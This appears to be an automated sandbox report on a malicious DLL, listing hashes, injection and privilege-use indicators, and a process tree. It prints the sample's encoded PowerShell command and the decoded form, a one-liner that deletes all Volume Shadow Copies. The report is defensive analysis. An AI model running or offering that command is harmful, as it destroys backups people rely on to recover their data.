Analysis

max time kernel: 123s
max time network: 123s
platform: windows7_x64
resource: win7-en-20211208
submitted: 30-01-2022 07:55

Static task: static1

Behavioral task: behavioral1
Sample: 2ae3e572ea01749df392a54bcf685e606bbb0e69e7f0dc5ed9014203fdea619c.dll
Resource: win7-en-20211208

Behavioral task: behavioral2
Sample: 2ae3e572ea01749df392a54bcf685e606bbb0e69e7f0dc5ed9014203fdea619c.dll
Resource: win10-en-20211208
General

Target: 2ae3e572ea01749df392a54bcf685e606bbb0e69e7f0dc5ed9014203fdea619c.dll
Size: 166KB
MD5: b0202897062e62cdbf80a329b496534f
SHA1: c15ea2f6565e9aa89be81fa49a0daeb83d205014
SHA256: 2ae3e572ea01749df392a54bcf685e606bbb0e69e7f0dc5ed9014203fdea619c
SHA512: b9bc991412f76055876d18648d37763ca0437b2c70f6464c0c6d18f6d8a1fc40ddd85fcef68194b1a07f7d0eccba86605a4d2d013544372fe1093e0fe51f6211
Malware Config
Signatures

Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.

description               ioc     Process
File opened (read-only)   \??\G:  rundll32.exe
File opened (read-only)   \??\H:  rundll32.exe
File opened (read-only)   \??\I:  rundll32.exe
File opened (read-only)   \??\M:  rundll32.exe
File opened (read-only)   \??\T:  rundll32.exe
File opened (read-only)   \??\U:  rundll32.exe
File opened (read-only)   \??\F:  rundll32.exe
File opened (read-only)   \??\J:  rundll32.exe
File opened (read-only)   \??\N:  rundll32.exe
File opened (read-only)   \??\P:  rundll32.exe
File opened (read-only)   \??\V:  rundll32.exe
File opened (read-only)   \??\W:  rundll32.exe
File opened (read-only)   \??\B:  rundll32.exe
File opened (read-only)   \??\E:  rundll32.exe
File opened (read-only)   \??\K:  rundll32.exe
File opened (read-only)   \??\L:  rundll32.exe
File opened (read-only)   \??\Y:  rundll32.exe
File opened (read-only)   \??\A:  rundll32.exe
File opened (read-only)   \??\O:  rundll32.exe
File opened (read-only)   \??\Q:  rundll32.exe
File opened (read-only)   \??\R:  rundll32.exe
File opened (read-only)   \??\S:  rundll32.exe
File opened (read-only)   \??\X:  rundll32.exe
File opened (read-only)   \??\Z:  rundll32.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)

pid   Process
324   rundll32.exe
776   powershell.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)

description                pid   Process
Token: SeDebugPrivilege    324   rundll32.exe
Token: SeDebugPrivilege    776   powershell.exe
Token: SeBackupPrivilege   2024  vssvc.exe
Token: SeRestorePrivilege  2024  vssvc.exe
Token: SeAuditPrivilege    2024  vssvc.exe

Suspicious use of WriteProcessMemory (11 IoCs)

description                      pid   Process       procid_target
PID 1968 wrote to memory of 324  1968  rundll32.exe  27
PID 1968 wrote to memory of 324  1968  rundll32.exe  27
PID 1968 wrote to memory of 324  1968  rundll32.exe  27
PID 1968 wrote to memory of 324  1968  rundll32.exe  27
PID 1968 wrote to memory of 324  1968  rundll32.exe  27
PID 1968 wrote to memory of 324  1968  rundll32.exe  27
PID 1968 wrote to memory of 324  1968  rundll32.exe  27
PID 324 wrote to memory of 776   324   rundll32.exe  28
PID 324 wrote to memory of 776   324   rundll32.exe  28
PID 324 wrote to memory of 776   324   rundll32.exe  28
PID 324 wrote to memory of 776   324   rundll32.exe  28
Processes

C:\Windows\system32\rundll32.exe (PID 1968)
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\2ae3e572ea01749df392a54bcf685e606bbb0e69e7f0dc5ed9014203fdea619c.dll,#1
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\rundll32.exe (PID 324)
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\2ae3e572ea01749df392a54bcf685e606bbb0e69e7f0dc5ed9014203fdea619c.dll,#1
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 776)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded -e argument (base64 of UTF-16LE): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID 2024)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken